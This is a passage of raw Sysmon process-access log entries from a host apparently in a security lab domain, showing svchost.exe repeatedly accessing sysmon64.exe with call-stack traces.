T4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.487{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 